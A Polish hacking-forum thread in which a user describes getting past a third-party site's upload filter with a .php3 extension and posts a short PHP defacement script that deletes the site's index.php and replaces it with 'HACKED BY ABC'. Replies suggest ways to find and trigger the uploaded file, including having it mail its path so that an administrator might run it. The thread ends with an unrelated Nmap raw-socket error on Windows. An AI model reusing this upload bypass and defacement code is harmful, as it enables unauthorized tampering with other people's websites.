sunsetting
wysłałem pewien plik php na serwer i potrzebuje sprawdzic w jakim katalogu sie zapisał.
Kiedyś bawiłem sie nmapem - wpisałem wówczas jakąś komendę i wyświetliło mi wszystkie pliki znajdujące sie na serwie - ale już nie pamiętam tej opcji...
nie ma takiej opcji. chyba ze ja bladze w ciemnosciach nazwy katalogow mozesz czasami wyczaic ze zrodelka strony albo strzelac w standardowe. obczaj jakies pajeczaki np webscarab . wtedy mozesz szukac swojego pliczku. a jesli zmienia nazwy plikow przy uploadzie to juz chyba tylko bruteforcem. aczkolwiek moge sie mylic zupelnie:D
a jak to można inaczej zrobić ?
bo jest pewna strona i ma upload /zgłos oferte/ filtruje pliki na .php .zip i inne
ale .php3 jest wolne
Więc zrobiłem z.php3:
Kod:
<?php
$nazwa_pliku = 'index.php';
$tekst = "<b>HACKED BY ABC</b>";
unlink($nazwa_pliku);
$uchwyt = fopen($nazwa_pliku, "w+");
fwrite($uchwyt, $tekst);
fclose($uchwyt);
?>
ino teraz nie wiem jak uruchomic ten plik
[ Dodano: Sro Lut 17, 2010 1:39 pm ]
EDIT:
A jak w google wpisze:
site:www.xxx.pl file:*.php3
to mi znajdzie?
tylko w tym problem że zanim roboty google zaindeksują ten plik ....
nie masz pojecia o co walczysz te php3 niekoniecznie ma szanse przejsc czasami sie da to w headersah wymotac. chcesz jebnac cos o czym nie masz pojecia a dla zasady to sie ucina.
czyli jak mam zrobic
skrypty piszą różni ludzie jeśli już coś boty by zindeksowały to szukał bym plików które powinny się tam znaleść z rozszerzeniami przewidzianymi przez skrypt, ale to prawdopodobnie nic ci nie da. Ja bym jeszcze spróbował zrobić taki trick w skrypcie pobrać aktualny adres i wysłać go funkcją mail() do sibie, skoro jest to "zgłoś ofertę" to w końcu ktoś będzie przeglądał te pliki i może przy odrobinie szczęścia odpali skrypt sam.
NA jakiej stronie to zrobiłeś? Zapodaj linka
Starting Nmap 5.00 ( http://nmap.org ) at 2010-05-16 22:36 GMT (czas standardowy)
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't work on Windows.
pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: Nie można odnaleźć urządzenia. (20). Will wait 5 seconds then retry.
pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: Nie można odnaleźć urządzenia. (20). Will wait 25 seconds then retry.
Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: Nie można odnaleźć urządzenia. (20)
There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.
*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod).
*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the --unprivileged command-line argument will help.
SOLARIS: If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-PN -sT localhost" though.
QUITTING!
mam windowsa jak skanuje ip to mi tak wyskakuje-o co chodzi-co to urzadzenie 20,i czy windows dla tego programu to przeszkoda??